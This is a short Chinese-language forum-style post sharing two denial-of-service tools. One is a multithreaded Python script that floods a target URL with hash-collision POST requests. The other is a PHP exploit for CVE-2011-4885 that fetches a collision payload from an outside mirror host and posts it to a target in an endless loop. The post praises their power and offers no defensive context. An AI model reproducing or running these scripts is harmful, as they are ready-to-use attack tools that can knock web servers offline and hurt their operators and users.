不多说。威力巨大。
import threading,argparse,sys,socket,re
import urllib.parse as up
parser = argparse.ArgumentParser(description='Http range Dos tools,by Yatere.')
parser.add_argument('-t',help="Trager's url")
parser.add_argument('-r',default=256,type=int,help="Trager's Threading Number")
args = parser.parse_args()
if args.t ==None:
parser.print_help()
sys.exit(1)
host=up.urlsplit(args.t).netloc
file=up.urlsplit(args.t).path+up.urlsplit(args.t).query
threadno=args.r
port=80
a=0
txt=''
for i in range(1,32768):
a=a+32768
txt=txt+'&array['+str(a)+"]=0"
had='POST /'+file+' HTTP/1.1\r\nHost: '+host+'\r\nAccept: */*\r\nContent-Length: 621444\r\nConnection: close\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n'+txt
class yk(threading.Thread):
def __init__(self,domain,port=80):
super(yk,self).__init__()
self.domain=domain
self.port=port
self.start()
def run(self):
while True:
try:
a=socket.socket()
a.connect((self.domain,self.port))
a.send(had.encode())
a.close()
print('HEADing\n')
except Exception as a:
print (a)
pass
for i in range(threadno):
yk(host,port)
windows 版本扫后上传
国外另外一个
<?php
/*
PHP 5.3.* Hash Colission DoS Exploit by infodox
Original version by itz me (opensc.ws)
CVE-2011-4885
Mirrors List:
http://compsoc.nuigalway.ie/~infodox/hashcollide.txt
http://jrs-s.net/hashcollide.txt
http://www.infodox.co.cc/Downloads/hashcollide.txt
Changes:
Different mirror for hashcollide.txt
Now takes target as a command line argument
Status message printing
Twitter: @info_dox
Blog: blog.infodox.co.cc
Site: http://www.infodox.co.cc/
*/
$targ = $argv[1];
$x = file_get_contents("http://jrs-s.net/hashcollide.txt"); // if this doesnt work replace with the mirrors_lst ones...
while(1) {
echo "firing";
$ch = curl_init("$targ");
curl_setopt($ch, CURLOPT_POSTFIELDS, $x);
curl_exec($ch);
curl_close($ch);
echo "[+] Voly Sent!";
}
?>